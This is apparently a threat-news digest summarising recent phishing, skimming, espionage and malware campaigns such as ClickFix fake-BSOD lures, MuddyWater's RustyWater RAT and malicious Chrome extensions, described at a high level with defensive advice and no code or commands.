VulnHub

A new phishing campaign is targeting employees by exploiting their anxiety around performance reviews. The attackers are sending emails that impersonate management or HR, claiming to discuss performance evaluations scheduled for October 2025 and falsely hinting at potential layoffs. This tactic aims to create urgency and fear, prompting recipients to click on malicious links or download malware. Companies and employees need to be vigilant, as these scams can lead to data breaches or financial loss. The incident highlights the need for better cybersecurity awareness and training, especially during sensitive times like performance review periods.

Researchers have uncovered a significant web skimming campaign that has been stealing credit card information from online checkout pages since January 2022. This attack primarily targets major payment networks, including American Express, Mastercard, and UnionPay, affecting enterprise organizations that use these payment services. The skimming malware is designed to capture sensitive payment information as users enter it during online transactions. As a result, customers of these affected enterprises may be at risk of fraud and identity theft. It’s crucial for businesses to enhance their security measures and for users to monitor their financial statements for any suspicious activity.

The latest Security Affairs Malware newsletter covers a range of malware-related issues affecting users and organizations globally. One notable threat is the VVS Discord Stealer, which employs Pyarmor to obfuscate its code and evade detection. Additionally, researchers are raising alarms about malicious NPM packages that deliver the NodeCordRAT, a remote access tool that can compromise systems. The newsletter also discusses a new campaign linked to the Astaroth worm, which is being spread through WhatsApp in Brazil. These findings highlight the ongoing challenges in malware detection and the evolving tactics used by cybercriminals, putting many users at risk.

MuddyWater, an Iranian hacking group, has launched a spear-phishing campaign targeting various sectors in the Middle East, including diplomatic, maritime, financial, and telecom organizations. The attackers are using malicious Word documents that employ icon spoofing to trick users into activating a Rust-based remote access tool (RAT) known as RustyWater. This malware allows for asynchronous command and control, registry persistence, and anti-analysis capabilities, making it difficult for victims to detect and remove. The implications of this campaign are significant, as it could compromise sensitive information and disrupt critical infrastructure in the affected sectors. Organizations in these areas should be vigilant and enhance their cybersecurity measures to protect against such targeted attacks.

The FBI has issued a warning about a phishing campaign linked to North Korea's Kimsuky APT group, which is using QR codes as part of their tactics. This group is known for targeting individuals and organizations, particularly in sectors like defense and technology. By embedding malicious links in QR codes, attackers aim to trick victims into providing sensitive information or downloading malware. This method is particularly concerning as QR codes are increasingly used in everyday transactions, making it easier for attackers to exploit unsuspecting users. Organizations and individuals should be vigilant and verify the legitimacy of QR codes before scanning them, as this campaign highlights a growing trend in cyber threats.

The China-linked hacking group UAT-7290 has been actively spying on telecom providers in South Asia and Southeastern Europe since 2022. This group uses modular malware, including tools named RushDrop, DriveSwitch, and SilentRaid, to infiltrate and monitor their targets. By embedding deeply within the victim networks, they conduct extensive espionage operations that could compromise sensitive communications and data. The ongoing attacks raise concerns about the vulnerability of telecom infrastructure in these regions and the potential risks to national security and privacy for users. As these threats continue to evolve, it is crucial for telecom companies to enhance their cybersecurity measures to protect against such sophisticated espionage tactics.

Attackers are employing a combination of social engineering tactics, including fake CAPTCHAs and counterfeit Blue Screen of Death (BSOD) messages, to trick users into executing harmful code. This method, known as ClickFix, prompts victims to copy and paste malicious scripts, potentially compromising their systems. The attacks primarily target unsuspecting Windows users who may panic upon seeing the fake BSOD, believing their computer has crashed. It's crucial for users to be aware of these tactics and to verify the legitimacy of any error messages before taking action. This incident serves as a reminder of the importance of maintaining vigilance against deceptive online threats.

A new wave of attacks using GoBruteforcer malware is targeting cryptocurrency and blockchain projects by exploiting exposed databases. Researchers believe that many of these databases are improperly configured, potentially using AI-generated examples as templates. This makes them vulnerable to brute force attacks, where attackers try numerous password combinations to gain unauthorized access. The focus on crypto and blockchain projects is particularly concerning given the high value of assets and sensitive information involved. Companies in this space need to ensure their servers are securely configured to prevent these types of attacks, as the risk of data breaches and financial losses is significant.

Cybersecurity researchers have identified two malicious Chrome extensions that have collectively attracted over 900,000 users. These extensions, named 'Chat GPT for Chrome with GPT-5' and 'Claude Sonnet & DeepSeek AI,' are designed to steal conversations from OpenAI's ChatGPT and DeepSeek, along with users' browsing data. The stolen information is sent to servers controlled by the attackers. This incident raises significant concerns about user privacy and data security, as many individuals may unknowingly be exposing sensitive information through these extensions. Users are urged to remove these extensions immediately and review their online security practices to protect their data.

A new malware campaign known as PHALT#BLYX ClickFix is targeting the hospitality sector, exploiting social engineering tactics and the MSBuild.exe tool. This multi-stage attack has been specifically designed to infiltrate hospitality organizations, putting sensitive data and operations at risk. Researchers have noted that the campaign employs deceptive strategies to trick users into executing malicious code. As a result, affected companies could face significant disruptions and potential data breaches, making it crucial for hospitality organizations to remain vigilant and enhance their cybersecurity measures. The ongoing threat emphasizes the need for robust employee training and awareness to combat social engineering tactics effectively.

Cybersecurity researchers at Securonix have reported a new campaign targeting the European hospitality sector, known as PHALT#BLYX. This campaign uses fake booking emails to trick hotel staff into clicking on links that lead to counterfeit blue screen of death (BSoD) error pages. By doing so, attackers aim to install a remote access trojan called DCRat on the victims' systems. This type of malware allows hackers to gain unauthorized access to sensitive information and control over the infected devices. The incident underscores the need for heightened vigilance among hotel employees regarding suspicious emails and links, as these tactics can lead to severe security breaches.

Email continues to be the main entry point for cyber attackers, with significant increases in various types of email threats. Malware delivered through email surged by over 130% year-over-year, while phishing scams rose by more than 20% and other scams increased by 30%. These alarming trends expose vulnerabilities across different industries, indicating that many security teams are still missing critical gaps in their defenses. As attackers increasingly exploit email for impersonation and account takeover, companies must reassess their email security strategies to better protect sensitive information and prevent breaches. The growing reliance on email as a communication tool makes it essential for organizations to prioritize security measures in this area.

A new social engineering attack called ClickFix is targeting the hospitality industry in Europe by using fake Windows Blue Screen of Death (BSOD) screens. This scheme tricks users into believing their systems have crashed, prompting them to manually compile and run malicious software. The attackers are specifically focusing on employees in hotels and related businesses, making this a significant threat to sensitive customer data and operational continuity. Companies in this sector need to raise awareness among staff and implement training to recognize such scams. The use of a familiar error screen is particularly deceptive, as it plays on users' fears of system failures, leading them to take harmful actions without realizing the risks.

A group of hackers known as UAC-0184, believed to be aligned with Russia, has been targeting Ukrainian military and government organizations by using the Viber messaging app. They are sending malicious ZIP files that likely contain malware designed for espionage. According to the 360 Threat Intelligence Center, these activities have been ongoing and are part of a broader strategy to gather intelligence on Ukraine's military operations. This incident highlights the ongoing cyber warfare between Russia and Ukraine, emphasizing the need for heightened security measures within government and military communications. As the conflict continues, the use of widely used messaging platforms for cyber attacks poses significant risks to sensitive information.